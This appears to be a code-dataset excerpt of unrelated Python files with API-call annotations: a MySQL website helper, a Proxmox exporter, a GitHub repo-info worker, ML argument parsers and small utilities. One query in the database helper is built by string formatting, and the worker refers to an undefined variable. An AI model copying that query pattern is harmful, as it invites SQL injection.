peon.src.project.file.function_def.function import FunctionLint\n'), ((828, 894), 'peon.src.project.file.function_def.function.FunctionLint', 'FunctionLint', ([], {'definition': 'ReflectionAtLineFixture.type_at_first_lvl'}), '(definition=ReflectionAtLineFixture.type_at_first_lvl)\n', (840, 894), False, 'from peon.src.project.file.function_def.function import FunctionLint\n'), ((990, 1064), 'peon.src.project.file.function_def.function.FunctionLint', 'FunctionLint', ([], {'definition': 'ReflectionAtLineFixture.is_instance_at_second_lvl'}), '(definition=ReflectionAtLineFixture.is_instance_at_second_lvl)\n', (1002, 1064), False, 'from peon.src.project.file.function_def.function import FunctionLint\n'), ((1153, 1220), 'peon.src.project.file.function_def.function.FunctionLint', 'FunctionLint', ([], {'definition': 'ReflectionAtLineFixture.type_at_second_lvl'}), '(definition=ReflectionAtLineFixture.type_at_second_lvl)\n', (1165, 1220), False, 'from peon.src.project.file.function_def.function import FunctionLint\n')] |
###############################################################################
# #
'''Website Database-connection-related features''' #
# #
###############################################################################
import cymysql
from conf import website_db
from time import gmtime
from time import strftime
db_host = website_db.ip
db_port = website_db.port
db = website_db.db
db_user = website_db.user
db_pw = website_db.pw
###############################################################################
# #
'''Database-connect and close'''                                             #
# #
###############################################################################
def db_con():
conn = cymysql.connect(host=db_host, port=db_port, user=db_user, passwd=db_pw, db=db)
cur = conn.cursor()
return conn, cur
def db_close(conn, cur):
cur.close()
conn.close()
###############################################################################
# #
'''Donation-Page data''' #
# #
###############################################################################
def donate_save(nick):
conn, cur = db_con()
time = strftime('%Y.%m.%d - %H:%M:%S', gmtime())
cur.execute('INSERT INTO `donate` (`time`, `user`) VALUES (%s, %s)', (time, nick))
conn.commit()
db_close(conn, cur)
def donate_read():
conn, cur = db_con()
cur.execute('SELECT * FROM `donate` ORDER BY `time` DESC LIMIT 20')
nicks = list()
for r in cur.fetchall():
nicks.append([r[0], r[1]])
db_close(conn, cur)
return nicks
###############################################################################
# #
'''Short-URL data''' #
# #
###############################################################################
def shorturl_save(surl, url):
conn, cur = db_con()
cur.execute('INSERT INTO `shorturls` (`surl`, `url`) VALUES (%s, %s)', (surl, url))
conn.commit()
db_close(conn, cur)
def shorturl_read():
conn, cur = db_con()
cur.execute('SELECT * FROM `shorturls`')
urls = list()
for r in cur.fetchall():
urls.append([r[0], r[0], r[1]])
db_close(conn, cur)
return urls
###############################################################################
# #
'''Old Worlds''' #
# #
###############################################################################
def get_old_worlds(item):
conn, cur = db_con()
sql = 'SELECT * FROM `oldworlds` ORDER BY `date` DESC LIMIT {0}, {1}'.format(item, 20)
cur.execute(sql)
worlds = cur.fetchall()
db_close(conn, cur)
return worlds
###############################################################################
# #
'''Server Backup-Size in Dash''' #
# #
###############################################################################
def backup_size():
conn, cur = db_con()
dbtshock = []
tserver = []
htdocs = []
cur.execute('SELECT * FROM `backups`')
for r in cur.fetchall():
if r[1] == 'db':
dbtshock.append([r[0] * 1000, r[2]])
elif r[1] == 'tserver':
tserver.append([r[0] * 1000, r[2]])
elif r[1] == 'htdocs':
htdocs.append([r[0] * 1000, r[2]])
db_close(conn, cur)
return (dbtshock, tserver, htdocs)
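# Example (illustrative sketch, not from the original file): every helper
# above follows the same connect -> execute -> close pattern; a caller might
# combine them like this (requires the MySQL server configured in
# conf.website_db to be reachable).
def example_dashboard_data():
    worlds = get_old_worlds(0)   # newest 20 old worlds
    donors = donate_read()       # last 20 donations as [time, user] pairs
    backups = backup_size()      # (dbtshock, tserver, htdocs) series
    return worlds, donors, backups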
| [
"cymysql.connect",
"time.gmtime"
]
| [((1043, 1121), 'cymysql.connect', 'cymysql.connect', ([], {'host': 'db_host', 'port': 'db_port', 'user': 'db_user', 'passwd': 'db_pw', 'db': 'db'}), '(host=db_host, port=db_port, user=db_user, passwd=db_pw, db=db)\n', (1058, 1121), False, 'import cymysql\n'), ((1722, 1730), 'time.gmtime', 'gmtime', ([], {}), '()\n', (1728, 1730), False, 'from time import gmtime\n')] |
"""
Proxmox VE exporter for the Prometheus monitoring system.
"""
import sys
from argparse import ArgumentParser
from pve_exporter.http import start_http_server
def main(args=None):
"""
Main entry point.
"""
parser = ArgumentParser()
parser.add_argument('config', nargs='?', default='pve.yml',
help='Path to configuration file (pve.yml)')
parser.add_argument('port', nargs='?', type=int, default='9221',
help='Port on which the exporter is listening (9221)')
parser.add_argument('address', nargs='?', default='',
help='Address to which the exporter will bind')
params = parser.parse_args(args if args is not None else sys.argv[1:])
start_http_server(params.config, params.port, params.address)
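# Illustrative addition (not in the original snippet): a standard entry-point
# guard so the exporter can be launched directly; with no arguments, main()
# parses sys.argv[1:].
if __name__ == '__main__':
    main()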
| [
"pve_exporter.http.start_http_server",
"argparse.ArgumentParser"
]
| [((236, 252), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (250, 252), False, 'from argparse import ArgumentParser\n'), ((741, 802), 'pve_exporter.http.start_http_server', 'start_http_server', (['params.config', 'params.port', 'params.address'], {}), '(params.config, params.port, params.address)\n', (758, 802), False, 'from pve_exporter.http import start_http_server\n')] |
#SPDX-License-Identifier: MIT
import logging, os, sys, time, requests, json
from datetime import datetime
from multiprocessing import Process, Queue
import pandas as pd
import sqlalchemy as s
from workers.worker_base import Worker
# NOTE: This worker primarily inserts rows into the REPO_INFO table, which serves the primary purposes of
# 1. Displaying discrete metadata like "number of forks" and how they change over time
# 2. Validating other workers, like those related to pull requests, issues, and commits. Our totals should be at or very near the totals in the repo_info table.
# This table also updates the REPO table in 2 cases:
# 1. Recognizing when a repository is a forked repository by updating the "forked_from" field and
# 2. Recognizing when a repository is archived, and recording the data we observed the change in status.
class RepoInfoWorker(Worker):
def __init__(self, config={}):
worker_type = "repo_info_worker"
# Define what this worker can be given and know how to interpret
given = [['github_url']]
models = ['repo_info']
# Define the tables needed to insert, update, or delete on
data_tables = ['repo_info', 'repo']
operations_tables = ['worker_history', 'worker_job']
# Run the general worker initialization
super().__init__(worker_type, config, given, models, data_tables, operations_tables)
# Define data collection info
self.tool_source = 'Repo Info Worker'
self.tool_version = '1.0.0'
self.data_source = 'GitHub API'
def repo_info_model(self, task, repo_id):
github_url = task['given']['github_url']
self.logger.info("Beginning filling the repo_info model for repo: " + github_url + "\n")
owner, repo = self.get_owner_repo(github_url)
url = 'https://api.github.com/graphql'
query = """
{
repository(owner:"%s", name:"%s"){
updatedAt
hasIssuesEnabled
issues(states:OPEN) {
totalCount
}
hasWikiEnabled
forkCount
defaultBranchRef {
name
}
watchers {
totalCount
}
id
licenseInfo {
name
url
}
stargazers {
totalCount
}
codeOfConduct {
name
url
}
issue_count: issues {
totalCount
}
issues_closed: issues(states:CLOSED) {
totalCount
}
pr_count: pullRequests {
totalCount
}
pr_open: pullRequests(states: OPEN) {
totalCount
}
pr_closed: pullRequests(states: CLOSED) {
totalCount
}
pr_merged: pullRequests(states: MERGED) {
totalCount
}
ref(qualifiedName: "master") {
target {
... on Commit {
history(first: 0){
totalCount
}
}
}
}
}
}
""" % (owner, repo)
# Hit the graphql endpoint and retry 3 times in case of failure
num_attempts = 0
success = False
data = None
while num_attempts < 3:
self.logger.info("Hitting endpoint: {} ...\n".format(url))
r = requests.post(url, json={'query': query}, headers=self.headers)
self.update_gh_rate_limit(r)
try:
data = r.json()
except:
data = json.loads(json.dumps(r.text))
if 'errors' in data:
self.logger.info("Error!: {}".format(data['errors']))
if data['errors'][0]['message'] == 'API rate limit exceeded':
self.update_gh_rate_limit(r)
continue
if 'data' in data:
success = True
data = data['data']['repository']
break
else:
self.logger.info("Request returned a non-data dict: {}\n".format(data))
if data['message'] == 'Not Found':
self.logger.info("Github repo was not found or does not exist for endpoint: {}\n".format(url))
break
if data['message'] == 'You have triggered an abuse detection mechanism. Please wait a few minutes before you try again.':
self.update_gh_rate_limit(r, temporarily_disable=True)
continue
if data['message'] == 'Bad credentials':
self.update_gh_rate_limit(r, bad_credentials=True)
continue
num_attempts += 1
if not success:
self.logger.error('Cannot hit endpoint after 3 attempts. \"Completing\" task.\n')
self.register_task_completion(self.task, repo_id, 'repo_info')
return
# Just checking that the data is accessible (would not be if repo no longer exists)
try:
data['updatedAt']
except Exception as e:
self.logger.error('Cannot access repo_info data: {}\nError: {}. \"Completing\" task.'.format(data, e))
self.register_task_completion(self.task, repo_id, 'repo_info')
return
# Get committers count info that requires a separate endpoint
committers_count = self.query_committers_count(owner, repo)
# Put all data together in format of the table
self.logger.info(f'Inserting repo info for repo with id:{repo_id}, owner:{owner}, name:{repo}\n')
rep_inf = {
'repo_id': repo_id,
'last_updated': data['updatedAt'] if 'updatedAt' in data else None,
'issues_enabled': data['hasIssuesEnabled'] if 'hasIssuesEnabled' in data else None,
'open_issues': data['issues']['totalCount'] if data['issues'] else None,
'pull_requests_enabled': None,
'wiki_enabled': data['hasWikiEnabled'] if 'hasWikiEnabled' in data else None,
'pages_enabled': None,
'fork_count': data['forkCount'] if 'forkCount' in data else None,
'default_branch': data['defaultBranchRef']['name'] if data['defaultBranchRef'] else None,
'watchers_count': data['watchers']['totalCount'] if data['watchers'] else None,
'UUID': None,
'license': data['licenseInfo']['name'] if data['licenseInfo'] else None,
'stars_count': data['stargazers']['totalCount'] if data['stargazers'] else None,
'committers_count': committers_count,
'issue_contributors_count': None,
'changelog_file': None,
'contributing_file': None,
'license_file': data['licenseInfo']['url'] if data['licenseInfo'] else None,
'code_of_conduct_file': data['codeOfConduct']['url'] if data['codeOfConduct'] else None,
'security_issue_file': None,
'security_audit_file': None,
'status': None,
'keywords': None,
'commit_count': data['ref']['target']['history']['totalCount'] if data['ref'] else None,
'issues_count': data['issue_count']['totalCount'] if data['issue_count'] else None,
'issues_closed': data['issues_closed']['totalCount'] if data['issues_closed'] else None,
'pull_request_count': data['pr_count']['totalCount'] if data['pr_count'] else None,
'pull_requests_open': data['pr_open']['totalCount'] if data['pr_open'] else None,
'pull_requests_closed': data['pr_closed']['totalCount'] if data['pr_closed'] else None,
'pull_requests_merged': data['pr_merged']['totalCount'] if data['pr_merged'] else None,
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
}
result = self.db.execute(self.repo_info_table.insert().values(rep_inf))
self.logger.info(f"Primary Key inserted into repo_info table: {result.inserted_primary_key}\n")
self.results_counter += 1
# Note that the addition of information about where a repository may be forked from, and whether a repository is archived, updates the `repo` table, not the `repo_info` table.
forked = self.is_forked(owner, repo)
archived = self.is_archived(owner, repo)
archived_date_collected = None
if archived is not False:
archived_date_collected = archived
archived = 1
else:
archived = 0
rep_additional_data = {
'forked_from': forked,
'repo_archived': archived,
'repo_archived_date_collected': archived_date_collected
}
result = self.db.execute(self.repo_table.update().where(
self.repo_table.c.repo_id==repo_id).values(rep_additional_data))
self.logger.info(f"Inserted info for {owner}/{repo}\n")
# Register this task as completed
self.register_task_completion(self.task, repo_id, "repo_info")
def query_committers_count(self, owner, repo):
self.logger.info('Querying committers count\n')
url = f'https://api.github.com/repos/{owner}/{repo}/contributors?per_page=100'
committers = 0
try:
while True:
r = requests.get(url, headers=self.headers)
self.update_gh_rate_limit(r)
committers += len(r.json())
if 'next' not in r.links:
break
else:
url = r.links['next']['url']
except Exception:
self.logger.exception('An error occurred while querying contributor count\n')
return committers
def is_forked(self, owner, repo): #/repos/:owner/:repo parent
self.logger.info('Querying parent info to verify if the repo is forked\n')
url = f'https://api.github.com/repos/{owner}/{repo}'
r = requests.get(url, headers=self.headers)
self.update_gh_rate_limit(r)
data = self.get_repo_data(url, r)
if 'fork' in data:
if 'parent' in data:
return data['parent']['full_name']
return 'Parent not available'
return False
def is_archived(self, owner, repo):
self.logger.info('Querying committers count\n')
url = f'https://api.github.com/repos/{owner}/{repo}'
r = requests.get(url, headers=self.headers)
self.update_gh_rate_limit(r)
data = self.get_repo_data(url, r)
if 'archived' in data:
if data['archived']:
if 'updated_at' in data:
return data['updated_at']
return 'Date not available'
return False
return False
def get_repo_data(self, url, response):
success = False
try:
data = response.json()
except:
data = json.loads(json.dumps(response.text))
if 'errors' in data:
self.logger.info("Error!: {}".format(data['errors']))
if data['errors'][0]['message'] == 'API rate limit exceeded':
self.update_gh_rate_limit(response)
if 'id' in data:
success = True
else:
self.logger.info("Request returned a non-data dict: {}\n".format(data))
if data['message'] == 'Not Found':
self.logger.info("Github repo was not found or does not exist for endpoint: {}\n".format(url))
if data['message'] == 'You have triggered an abuse detection mechanism. Please wait a few minutes before you try again.':
self.update_gh_rate_limit(response, temporarily_disable=True)
if data['message'] == 'Bad credentials':
self.update_gh_rate_limit(response, bad_credentials=True)
if not success:
self.register_task_failure(self.task, repo_id, "Failed to hit endpoint: {}".format(url))
return data
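# Illustrative sketch (not part of the original worker): the Link-header
# pagination pattern used by ``query_committers_count`` above, shown as a
# standalone helper.  ``requests`` exposes the parsed Link header on
# ``response.links``; GitHub keeps returning a ``next`` entry until the last
# page.  The function name is hypothetical.
def count_paginated_items(url, headers):
    total = 0
    while True:
        response = requests.get(url, headers=headers)
        total += len(response.json())
        if 'next' not in response.links:
            break
        url = response.links['next']['url']
    return total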
| [
"json.dumps",
"requests.post",
"requests.get"
]
| [((10670, 10709), 'requests.get', 'requests.get', (['url'], {'headers': 'self.headers'}), '(url, headers=self.headers)\n', (10682, 10709), False, 'import logging, os, sys, time, requests, json\n'), ((11137, 11176), 'requests.get', 'requests.get', (['url'], {'headers': 'self.headers'}), '(url, headers=self.headers)\n', (11149, 11176), False, 'import logging, os, sys, time, requests, json\n'), ((4041, 4104), 'requests.post', 'requests.post', (['url'], {'json': "{'query': query}", 'headers': 'self.headers'}), "(url, json={'query': query}, headers=self.headers)\n", (4054, 4104), False, 'import logging, os, sys, time, requests, json\n'), ((10035, 10074), 'requests.get', 'requests.get', (['url'], {'headers': 'self.headers'}), '(url, headers=self.headers)\n', (10047, 10074), False, 'import logging, os, sys, time, requests, json\n'), ((11663, 11688), 'json.dumps', 'json.dumps', (['response.text'], {}), '(response.text)\n', (11673, 11688), False, 'import logging, os, sys, time, requests, json\n'), ((4250, 4268), 'json.dumps', 'json.dumps', (['r.text'], {}), '(r.text)\n', (4260, 4268), False, 'import logging, os, sys, time, requests, json\n')] |
# coding: utf-8
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from __future__ import unicode_literals
import argparse
def parse_args_tolerance():
parser = argparse.ArgumentParser(description='just for tolerance')
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
args, _ = parser.parse_known_args()
return args.tolerance
def GB_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--n-estimators', help='number of estimators',
default=100, type=int)
parser.add_argument('--max-depth', help='maximum depth of trees',
default=3, type=int)
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-1, type=float)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
parser.add_argument('--skip-minuit', help='flag to skip minuit NLL minimization',
action='store_true')
args = parser.parse_args()
return args
def REG_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-4, type=float)
parser.add_argument('--beta1', help='beta 1 for Adam',
default=0.5, type=float)
parser.add_argument('--beta2', help='beta 2 for Adam',
default=0.9, type=float)
parser.add_argument('--weight-decay', help='weight decay for SGD',
default=0.0, type=float)
parser.add_argument('--optimizer', help='optimizer name', dest='optimizer_name',
default='Adam', type=str, choices=('Adam', 'SGD', 'ADAM', 'sgd', 'adam'))
parser.add_argument('--n-unit', help='Number of units in layers. Controls NN width.',
default=200, type=int)
parser.add_argument('--sample-size', help='data sample size',
default=1000, type=int)
parser.add_argument('--batch-size', help='mini-batch size',
default=20, type=int)
parser.add_argument('--n-steps', help='number of update steps',
default=1000, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
args = parser.parse_args()
return args
def INFERNO_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-3, type=float)
parser.add_argument('--temperature', help='control initial softmax steepness',
default=1.0, type=float)
parser.add_argument('--beta1', help='beta 1 for Adam',
default=0.5, type=float)
parser.add_argument('--beta2', help='beta 2 for Adam',
default=0.9, type=float)
parser.add_argument('--weight-decay', help='weight decay for SGD',
default=0.0, type=float)
parser.add_argument('--optimizer', help='optimizer name', dest='optimizer_name',
default='Adam', type=str, choices=('Adam', 'SGD', 'ADAM', 'sgd', 'adam'))
parser.add_argument('--n-unit', help='Number of units in layers. Controls NN width.',
default=200, type=int)
parser.add_argument('--n-bins', help='number of output bins',
default=10, type=int)
parser.add_argument('--sample-size', help='data sample size',
default=1000, type=int)
parser.add_argument('--batch-size', help='mini-batch size',
default=20, type=int)
parser.add_argument('--n-steps', help='number of update steps',
default=1000, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
args = parser.parse_args()
return args
def NET_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-3, type=float)
parser.add_argument('--beta1', help='beta 1 for Adam',
default=0.9, type=float)
parser.add_argument('--beta2', help='beta 2 for Adam',
default=0.999, type=float)
parser.add_argument('--weight-decay', help='weight decay for SGD',
default=0.0, type=float)
parser.add_argument('--optimizer', help='optimizer name', dest='optimizer_name',
default='Adam', type=str, choices=('Adam', 'SGD', 'ADAM', 'sgd', 'adam'))
parser.add_argument('--n-unit', help='Number of units in layers. Controls NN width.',
default=200, type=int)
parser.add_argument('--sample-size', help='data sample size',
default=1000, type=int)
parser.add_argument('--batch-size', help='mini-batch size',
default=1000, type=int)
parser.add_argument('--n-steps', help='number of update steps',
default=1000, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
args = parser.parse_args()
return args
def TP_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-3, type=float)
parser.add_argument('--trade-off', help='trade-off between classic loss and adversarial loss',
default=1.0, type=float)
parser.add_argument('--beta1', help='beta 1 for Adam',
default=0.9, type=float)
parser.add_argument('--beta2', help='beta 2 for Adam',
default=0.999, type=float)
parser.add_argument('--weight-decay', help='weight decay for SGD',
default=0.0, type=float)
parser.add_argument('--optimizer', help='optimizer name', dest='optimizer_name',
default='Adam', type=str, choices=('Adam', 'SGD', 'ADAM', 'sgd', 'adam'))
parser.add_argument('--n-unit', help='Number of units in layers. Controls NN width.',
default=200, type=int)
parser.add_argument('--sample-size', help='data sample size',
default=1000, type=int)
parser.add_argument('--batch-size', help='mini-batch size',
default=1000, type=int)
parser.add_argument('--n-steps', help='number of update steps',
default=1000, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
args = parser.parse_args()
return args
def PIVOT_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-3, type=float)
parser.add_argument('--trade-off', help='trade-off between classic loss and adversarial loss',
default=1.0, type=float)
parser.add_argument('--beta1', help='beta 1 for Adam',
default=0.9, type=float)
parser.add_argument('--beta2', help='beta 2 for Adam',
default=0.999, type=float)
parser.add_argument('--weight-decay', help='weight decay for SGD',
default=0.0, type=float)
parser.add_argument('--optimizer', help='optimizer name', dest='optimizer_name',
default='Adam', type=str, choices=('Adam', 'SGD', 'ADAM', 'sgd', 'adam'))
parser.add_argument('--n-unit', help='Number of units in layers. Controls NN width.',
default=200, type=int)
parser.add_argument('--sample-size', help='data sample size',
default=1000, type=int)
parser.add_argument('--batch-size', help='mini-batch size',
default=1000, type=int)
parser.add_argument('--n-steps', help='number of update steps',
default=1000, type=int)
parser.add_argument('--n-net-pre-training-steps', help='number of update steps for pretraining the classifier',
default=1000, type=int)
parser.add_argument('--n-adv-pre-training-steps', help='number of update steps for pretraining the adversarial',
default=1000, type=int)
parser.add_argument('--n-recovery-steps', help='number of update steps for adversarial recovery',
default=1, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
args = parser.parse_args()
return args
def FF_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--feature-id', help='feature index to filter on',
default=0, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
parser.add_argument('--skip-minuit', help='flag to skip minuit NLL minimization',
action='store_true')
args = parser.parse_args()
return args
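# Illustrative sketch (not in the original file): ``parse_args_tolerance``
# relies on ``parse_known_args`` so it can extract ``--tolerance`` from a
# command line that also carries flags meant for the other parsers; unknown
# arguments are returned rather than rejected.  The argument values below are
# hypothetical.
def _example_parse_known_args():
    parser = argparse.ArgumentParser(description='just for tolerance')
    parser.add_argument("--tolerance", type=float, default=0.1)
    args, unknown = parser.parse_known_args(['--tolerance', '0.2', '--n-steps', '500'])
    return args.tolerance, unknown   # (0.2, ['--n-steps', '500'])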
| [
"argparse.ArgumentParser"
]
| [((225, 282), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""just for tolerance"""'}), "(description='just for tolerance')\n", (248, 282), False, 'import argparse\n'), ((575, 628), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (598, 628), False, 'import argparse\n'), ((2495, 2548), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (2518, 2548), False, 'import argparse\n'), ((5058, 5111), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (5081, 5111), False, 'import argparse\n'), ((7862, 7915), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (7885, 7915), False, 'import argparse\n'), ((10422, 10475), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (10445, 10475), False, 'import argparse\n'), ((13135, 13188), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (13158, 13188), False, 'import argparse\n'), ((16320, 16373), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (16343, 16373), False, 'import argparse\n')] |
import math
class Schedule():
def __init__(self, total, batch_size):
self._batch_size = batch_size
self._state = ""
self.total = total
self.scheduled = 0
self.finished = 0
@property
def _batch(self):
return math.ceil(self.scheduled / self._batch_size)
@property
def _batches(self):
return math.ceil(self.total / self._batch_size)
@property
def _percentage(self):
_percentage = self.scheduled / self.total * 100
return "%.1f%%" % _percentage
def suffix(self, string):
return " ".join((
string,
"#%d/%d %s" %
(
self._batch,
self._batches,
self._percentage
)
))
def completed(self):
if self.finished != self.total:
raise ValueError(self.finished, self.total)
def __iter__(self):
return self
def __next__(self):
if self.scheduled >= self.total:
self._state = "pending, waiting for completion,"
raise StopIteration()
self.scheduled += self._batch_size
if self.scheduled > self.total:
self.scheduled = self.total
self._state = self.suffix("running, on batch") + ","
return self._batch
def __str__(self):
return " ".join(f"""
<Schedule {"done" if self.finished >= self.total else self._state}
total={self.total} scheduled={self.scheduled} finished={self.finished}>
""".split())
def test_01():
schedule = Schedule(100, 10)
for batch in schedule:
print(batch)
print(schedule)
def test_02():
schedule = Schedule(25, 10)
for batch in schedule:
print(batch)
print(schedule)
print(schedule.suffix("Task"))
def test_03():
schedule = Schedule(0, 10)
for batch in schedule:
print(batch)
print(schedule)
print(schedule.suffix("Task"))
def test_04():
schedule = Schedule(1, 10)
for batch in schedule:
print(batch)
print(schedule)
print(schedule.suffix("Task"))
if __name__ == "__main__":
test_02()
| [
"math.ceil"
]
| [((272, 316), 'math.ceil', 'math.ceil', (['(self.scheduled / self._batch_size)'], {}), '(self.scheduled / self._batch_size)\n', (281, 316), False, 'import math\n'), ((371, 411), 'math.ceil', 'math.ceil', (['(self.total / self._batch_size)'], {}), '(self.total / self._batch_size)\n', (380, 411), False, 'import math\n')] |
# -*- coding: utf-8 -*-
""" Function that implement Complement the Complementary Cumulative
Distribution Function (CCDF).
"""
#
# written by <NAME> <<EMAIL>>
import numpy as np
import pandas as pd
def ccdf(s):
"""
Parameters:
`s`, series, whose values are the variable to be handled
Return:
a new series `s`, index of s will be X axis (number), value of s
will be Y axis (probability)
"""
s = s.copy()
s = s.sort_values(ascending=True, inplace=False)
s.reset_index(drop=True, inplace=True)
n = len(s)
s.drop_duplicates(keep='first', inplace=True)
X = s.values
Y = [n - i for i in s.index]
return pd.Series(data=Y, index=X) / n
def sum_cdf(s):
s = s.copy()
s = s.value_counts()
s = s.sort_index(ascending=True)
cumulative = []
